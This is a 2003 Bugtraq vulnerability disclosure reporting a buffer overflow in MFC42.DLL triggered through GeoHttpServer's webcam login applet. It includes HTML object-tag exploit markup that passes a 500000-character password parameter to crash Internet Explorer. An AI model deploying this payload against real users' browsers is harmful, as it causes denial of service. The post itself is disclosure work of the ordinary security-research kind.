Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

GeoHttpServer[webcam] Causes MFC42.DLL to overflow

From: "Rafel Ivgi" <nuritrv18 () bezeqint net>
Date: Wed, 10 Dec 2003 21:16:17 +0200
GeoHttpServer[webcam] Causes MFC42.DLL to overflow

Discovered by Rafel Ivgi, The-Insider.
http://theinsider.deep-ice.com

The GeoHttpServer Login Java Applet Causes MFC42.DLL to overflow.
The Overflow occures when the "Password" parameter of the applet is
filled
with 500000 times "a". This bug causes Internet Explorer to be closed. 

Exploit:
<object classid="clsid:BF5E26B7-7087-4C2D-B0BA-0098F7CBED6B"
id="WebCamX1" width="355" height="300"
codebase="http://<GeoHttpServerip>/cab/Live.cab#version=5,3,0,1">

<param name="_Version" value="327682">
<param name="_ExtentX" value="9393">
<param name="_ExtentY" value="7938">
<param name="_StockProps" value="0">
<param name="IpAddress" value="<GeoHttpServerip>">
<param name="CommandPort" value="4550">
<param name="AudioDataPort = "6550">
<param name="DataPort" value="5550">
<param name="BandWidth" value="LAN">
<param name="FixSize" value="0">
<param name="DisablePWD" value="1">
<param name="Password" value="<a x 500000>">
<param name="UserName" value"default">
<param name="AutoLogin" value="0">
<param name="DefaultCam" value="1">
<param name="FixWidth" value="320">
<param name="FixHeight" value="240">
</object>

"Things that are unlikeable, are NOT impossible."
"A vulnerability doesn't exsist, until you expose it."
Previous By Date Next
Previous By Thread Next

Current thread: